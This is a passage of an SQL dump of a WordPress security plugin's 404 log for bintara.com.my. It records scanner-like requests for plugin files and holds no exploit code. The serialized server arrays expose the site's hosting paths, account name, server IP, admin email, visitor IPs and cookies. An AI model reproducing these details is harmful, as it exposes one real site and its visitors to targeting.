SV1)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:75:\"https://bintara.com.my/wp-content/plugins/booking-ultra-pro/js/bup-front.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:53:\"/wp-content/plugins/booking-ultra-pro/js/bup-front.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XajwIWxQCXaLINxK9P7mMgAAANc\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:75:\"https://bintara.com.my/wp-content/plugins/booking-ultra-pro/js/bup-front.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:53:\"/wp-content/plugins/booking-ultra-pro/js/bup-front.js\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XajwIWxQCXaLINxK9P7mMgAAANc\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:13:\"47.75.125.146\";s:11:\"REMOTE_PORT\";s:5:\"34805\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:75:\"https://bintara.com.my/wp-content/plugins/booking-ultra-pro/js/bup-front.js\";s:10:\"SCRIPT_URL\";s:53:\"/wp-content/plugins/booking-ultra-pro/js/bup-front.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XajwIWxQCXaLINxK9P7mMgAAANc\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571352609.7639\";s:12:\"REQUEST_TIME\";s:10:\"1571352609\";}}','notice','2019-10-17 22:50:11','2019-10-17 22:50:10',35173408,36978040,'https://bintara.com.my/wp-content/plugins/booking-ultra-pro/js/bup-front.js',1,0,'47.75.125.146'),(28252,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:54:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:48:\"/wp-content/plugins/booking-ultra-pro/README.txt\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:23:\"en-US,en;q=0.8,ru;q=0.6\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:70:\"https://bintara.com.my/wp-content/plugins/booking-ultra-pro/README.txt\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:48:\"/wp-content/plugins/booking-ultra-pro/README.txt\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XajwMfb4yAloRZFRtQOqRwAAAVY\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:70:\"https://bintara.com.my/wp-content/plugins/booking-ultra-pro/README.txt\";s:19:\"REDIRECT_SCRIPT_URL\";s:48:\"/wp-content/plugins/booking-ultra-pro/README.txt\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XajwMfb4yAloRZFRtQOqRwAAAVY\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:12:\"71.89.87.218\";s:11:\"REMOTE_PORT\";s:5:\"40014\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:70:\"https://bintara.com.my/wp-content/plugins/booking-ultra-pro/README.txt\";s:10:\"SCRIPT_URL\";s:48:\"/wp-content/plugins/booking-ultra-pro/README.txt\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XajwMfb4yAloRZFRtQOqRwAAAVY\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571352625.9561\";s:12:\"REQUEST_TIME\";s:10:\"1571352625\";}}','notice','2019-10-17 22:50:27','2019-10-17 22:50:26',35175176,36976136,'https://bintara.com.my/wp-content/plugins/booking-ultra-pro/README.txt',1,0,'71.89.87.218'),(28137,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:49:\"/beta/wp-content/plugins/solid_best_corp/info.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:71:\"https://bintara.com.my/beta/wp-content/plugins/solid_best_corp/info.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:49:\"/beta/wp-content/plugins/solid_best_corp/info.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XacC@czD-tBfd7-tNTJTqgAAAAU\";s:19:\"REDIRECT_SCRIPT_URI\";s:71:\"https://bintara.com.my/beta/wp-content/plugins/solid_best_corp/info.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:49:\"/beta/wp-content/plugins/solid_best_corp/info.php\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XacC@czD-tBfd7-tNTJTqgAAAAU\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"188.213.166.219\";s:11:\"REMOTE_PORT\";s:5:\"53548\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:71:\"https://bintara.com.my/beta/wp-content/plugins/solid_best_corp/info.php\";s:10:\"SCRIPT_URL\";s:49:\"/beta/wp-content/plugins/solid_best_corp/info.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XacC@czD-tBfd7-tNTJTqgAAAAU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571226361.8515\";s:12:\"REQUEST_TIME\";s:10:\"1571226361\";}}','notice','2019-10-16 11:46:04','2019-10-16 11:46:02',35678408,37478752,'https://bintara.com.my/beta/wp-content/plugins/solid_best_corp/info.php',1,0,'188.213.166.219'),(28279,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:54:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:59:\"/wp-content/plugins/astra-sites/inc/assets/js/admin-page.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:23:\"en-US,en;q=0.8,ru;q=0.6\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:81:\"https://bintara.com.my/wp-content/plugins/astra-sites/inc/assets/js/admin-page.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:59:\"/wp-content/plugins/astra-sites/inc/assets/js/admin-page.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XambJuDM3oDzMu3E5gMYSQAAAIk\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:81:\"https://bintara.com.my/wp-content/plugins/astra-sites/inc/assets/js/admin-page.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:59:\"/wp-content/plugins/astra-sites/inc/assets/js/admin-page.js\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XambJuDM3oDzMu3E5gMYSQAAAIk\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:10:\"5.8.253.40\";s:11:\"REMOTE_PORT\";s:5:\"35312\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:81:\"https://bintara.com.my/wp-content/plugins/astra-sites/inc/assets/js/admin-page.js\";s:10:\"SCRIPT_URL\";s:59:\"/wp-content/plugins/astra-sites/inc/assets/js/admin-page.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XambJuDM3oDzMu3E5gMYSQAAAIk\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571396390.5575\";s:12:\"REQUEST_TIME\";s:10:\"1571396390\";}}','notice','2019-10-18 10:59:54','2019-10-18 10:59:51',35176856,36979936,'https://bintara.com.my/wp-content/plugins/astra-sites/inc/assets/js/admin-page.js',1,0,'5.8.253.40'),(28278,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=0c199a4b6ba128de30d9bcc14ea7eda4\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"62563\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XambG3pVms2l1djUPbQZ8AAAAFY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571396379.7296\";s:12:\"REQUEST_TIME\";s:10:\"1571396379\";}}','notice','2019-10-18 10:59:42','2019-10-18 10:59:40',34924136,36744688,'https://bintara.com.my/?page_id=18',1,0,'136.243.199.108'),(28277,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=9ff2c123ed5923f8e7dc18a90008b7a6\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"61746\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xama-eDM3oDzMu3E5gMYJgAAAJU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571396349.2444\";s:12:\"REQUEST_TIME\";s:10:\"1571396349\";}}','notice','2019-10-18 10:59:12','2019-10-18 10:59:09',34920000,36727176,'https://bintara.com.my/?page_id=18',1,0,'136.243.199.108'),(28276,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=59f6958549e8e0a53cf593ab82b84b73\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"60761\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xama3uDM3oDzMu3E5gMYFgAAAIc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571396319.1086\";s:12:\"REQUEST_TIME\";s:10:\"1571396319\";}}','notice','2019-10-18 10:58:42','2019-10-18 10:58:39',34919832,36742736,'https://bintara.com.my/?page_id=18',1,0,'136.243.199.108'),(28274,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/?page_id=18/contact.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:140:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36 OPR/40.0.2308.81 (Edition Yx)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:22:\"page_id=18/contact.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"89.33.245.176\";s:11:\"REMOTE_PORT\";s:5:\"48180\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XamIGeDM3oDzMu3E5gMHYQAAAIE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571391513.8705\";s:12:\"REQUEST_TIME\";s:10:\"1571391513\";}}','notice','2019-10-18 09:38:36','2019-10-18 09:38:34',34918032,36716328,'https://bintara.com.my/?page_id=18/contact.php',1,0,'89.33.245.176'),(28275,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=1f89d36efd26545de44e13996bd80397\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"59817\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15: